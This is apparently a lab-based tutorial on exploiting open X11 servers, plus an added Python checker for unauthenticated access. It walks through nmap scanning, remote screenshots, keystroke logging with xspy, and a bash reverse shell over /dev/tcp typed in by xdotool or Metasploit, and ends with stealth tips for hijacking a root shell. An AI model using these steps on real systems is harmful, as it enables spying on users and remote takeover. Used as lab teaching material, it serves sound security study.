13 May 2016

X11 Hacking


This tutorial is based on the X11 server in the PWN Lab project. To install the VM, follow the instructions in the pwn_lab README, then execute the commands below. This VM will take a while to finish installing and configuring as it needs to download and install the ubuntu-desktop packages.

git clone https://github.com/ztgrace/pwn_lab.git
cd pwn_lab/x11
vagrant up

If all goes well, you should have a VM running that looks like this:

X11 VM

Attacker Setup

Install some required packages:

apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy

Installing xwatchwin

wget http://www.ibiblio.org/pub/X11/contrib/utilities/xwatchwin.tar.gz
tar zxvf xwatchwin.tar.gz
cd xwatchwin/
xmkmf && make && make install


X11 generally listens on TCP ports 6000-6063 (port 6000 plus the display number), however it’s most typically found on ports 6000-6002. We can use Nmap to scan for and identify X11.

root@pwnlab-kali-mini:~# nmap -sV -n -v -p 6000-6002

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-02 22:29 EST
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 22:29
Scanning [1 port]
Completed ARP Ping Scan at 22:29, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:29
Scanning [3 ports]
Discovered open port 6000/tcp on
Completed SYN Stealth Scan at 22:29, 0.00s elapsed (3 total ports)
Initiating Service scan at 22:29
Scanning 1 service on
Completed Service scan at 22:29, 6.01s elapsed (1 service on 1 host)
NSE: Script scanning
Nmap scan report for
Host is up (0.00044s latency).
6000/tcp open   X11     X.Org (open)
6001/tcp closed X11:1
6002/tcp closed X11:2
MAC Address: 08:00:27:1A:F3:00 (Cadmus Computer Systems)
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.21 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (152B)
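To make clear what nmap's "X.Org (open)" verdict actually tests, here is an added Python example (not part of the original post) that speaks the X11 connection-setup handshake itself: it sends a setup request with no authorization cookie and classifies the server's reply, so a defender can confirm from an audit host whether one of their own servers admits unauthenticated clients. The `check_display` helper and the sample reply bytes are constructed assumptions, not traffic captured from the lab VM.

```python
import socket
import struct

# Status byte of the X11 connection setup reply ("Connection Setup" in the X protocol spec)
X11_FAILED, X11_SUCCESS, X11_AUTHENTICATE = 0, 1, 2


def build_setup_request() -> bytes:
    """Little-endian setup request for protocol 11.0 with an empty
    authorization name and data, i.e. a client holding no MIT-MAGIC-COOKIE."""
    return struct.pack("<cxHHHHxx", b"l", 11, 0, 0, 0)


def parse_setup_reply(reply: bytes) -> dict:
    """Classify a setup reply. 'open' is True only when the server accepted
    the unauthenticated client, which is what nmap prints as 'X.Org (open)'."""
    if len(reply) < 8:
        raise ValueError("setup reply shorter than its 8-byte header")
    status = reply[0]
    if status == X11_FAILED:
        reason_len = reply[1]                        # reason string length in bytes
        reason = reply[8:8 + reason_len].decode("latin-1", "replace")
        return {"status": "failed", "open": False, "reason": reason}
    if status == X11_SUCCESS:
        major, minor = struct.unpack_from("<HH", reply, 2)
        return {"status": "success", "open": True, "reason": f"protocol {major}.{minor}"}
    if status == X11_AUTHENTICATE:
        units, = struct.unpack_from("<H", reply, 6)  # additional data, in 4-byte units
        reason = reply[8:8 + 4 * units].decode("latin-1", "replace").rstrip("\x00")
        return {"status": "authenticate", "open": False, "reason": reason}
    raise ValueError(f"unknown setup reply status {status}")


def check_display(host: str, display: int = 0, timeout: float = 3.0) -> dict:
    """Assumed audit helper: connect to TCP 6000 + display on a host you
    administer and report whether it admits clients without authorization."""
    with socket.create_connection((host, 6000 + display), timeout=timeout) as sock:
        sock.sendall(build_setup_request())
        reply = sock.recv(4096)              # header plus reason string fits easily
    return parse_setup_reply(reply)


# Constructed sample replies for offline testing (not captured from the lab VM).
SAMPLE_FAILED = (b"\x00" + bytes([21]) + struct.pack("<HHH", 11, 0, 6)
                 + b"No protocol specified".ljust(24, b"\x00"))
SAMPLE_SUCCESS = b"\x01\x00" + struct.pack("<HHH", 11, 0, 2) + b"\x00" * 8
SAMPLE_AUTH = b"\x02" + b"\x00" * 5 + struct.pack("<H", 2) + b"abcdefg\x00"

if __name__ == "__main__":
    for sample in (SAMPLE_FAILED, SAMPLE_SUCCESS, SAMPLE_AUTH):
        print(parse_setup_reply(sample))
```

A server hardened with `-nolisten tcp` never answers on 6000 at all, and one protected by xauth returns the Failed reply with "No protocol specified"; only a Success reply to this cookie-less request corresponds to the open server the lab VM exposes.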

Gathering Window Info

Before we start exploiting the system, it’s useful to gather some information about the windows. The xwininfo command

root@pwnlab-kali-mini:~# xwininfo -root -tree -display

xwininfo: Window id: 0x101 (the root window) (has no name)

  Root window id: 0x101 (the root window) (has no name)
  Parent window id: 0x0 (none)
     40 children:
     0x30002a7 "update-manager": ()  10x10+-100+-100  +-100+-100
     0x3000003 (has no name): ("update-manager" "Update-manager")  254x98+0+0  +0+0
        1 child:
        0x3000004 (has no name): ()  1x1+-1+-1  +-1+-1
     0x3000001 "update-manager": ("update-manager" "Update-manager")  10x10+10+10  +10+10
        1 child:
        0x3000002 (has no name): ()  1x1+-1+-1  +9+9
     0x2e00003 "update-notifier": ()  10x10+-100+-100  +-100+-100
     0x2e00001 "update-notifier": ("update-notifier" "Update-notifier")  10x10+10+10  +10+10
        1 child:
        0x2e00002 (has no name): ()  1x1+-1+-1  +9+9
     0x2c00001 "applet.py": ("applet.py" "Applet.py")  10x10+10+10  +10+10
        1 child:
        0x2c00002 (has no name): ()  1x1+-1+-1  +9+9
     0x1c00001 (has no name): ()  10x10+-20+-20  +-20+-20
     0xe00001 "Terminal": ("gnome-terminal" "Gnome-terminal")  10x10+10+10  +10+10
        1 child:
        0xe00002 (has no name): ()  1x1+-1+-1  +9+9
     0x1200068 (has no name): ()  10x10+0+0  +0+0

Screenshot The Display

The xwd tool can be used to create a screenshot of the remote desktop.

xwd -root -screen -silent -display > screenshot.xwd
convert screenshot.xwd screenshot.png


Keystroke logging

Keystroke logging can be accomplished using the xspy tool.

root@pwnlab-kali-mini:~# xspy
opened for snoopng


Watching The Display

To watch the display, you can use xwatchwin to watch a specific window or the entire desktop using the root window identifier.

./xwatchwin -u 0.5 root

Getting Shell

Method 1: xdotool

xdotool key alt+F2
xdotool type 'xterm'
xdotool key KP_Enter
xdotool type --delay 50 'bash -i >& /dev/tcp/ 0>&1'
xdotool key KP_Enter

On the attacker machine, catch the reverse shell:

# nc -lnvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 52876

Method 2: Metasploit

A recent Metasploit module was released and has simplified this attack by registering a virtual keyboard, then typing in the specified payload.

016-02-03 07:07:30 - S:0 J:0  > use exploit/unix/x11/x11_keyboard_exec
2016-02-03 07:07:32 - S:0 J:0  exploit(x11_keyboard_exec) > show options

Module options (exploit/unix/x11/x11_keyboard_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST    yes       The target address
   RPORT      6000             yes       The target port
   TIME_WAIT  5                yes       Time to wait for opening GUI windows in seconds

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   xterm (Generic)

2016-02-03 07:07:36 - S:0 J:0  exploit(x11_keyboard_exec) > set LHoST
LHoST =>
2016-02-03 07:07:52 - S:0 J:0  exploit(x11_keyboard_exec) > exploit

[*] Started reverse TCP handler on
[*] - Register keyboard
[*] - Opening "Run Application"
[*] - Waiting 5 seconds...
[*] - Opening xterm
[*] - Waiting 5 seconds...
[*] - Typing and executing payload
[*] Command shell session 1 opened ( -> at 2016-02-03 07:09:20 -0600

uid=1000(vagrant) gid=1000(vagrant) groups=4(adm),20(dialout),24(cdrom),46(plugdev),108(lpadmin),109(sambashare),110(admin),1000(vagrant)

Don’t Forget About Desktops!

Most Linux window managers have multiple desktops. I’ve come across an open X11 server on an engagement with nothing on the first desktop, but a root shell on a different one. Using xdotool, you can change which desktop you’re viewing and manipulating. Be warned: this desktop switch would be visible to anyone else viewing the desktop.

export DISPLAY=
xdotool get_desktop
xdotool set_desktop 1

A stealthier way of exploiting this root shell would be to comb through the xwininfo output and use the window option of xdotool to send commands directly to that window.
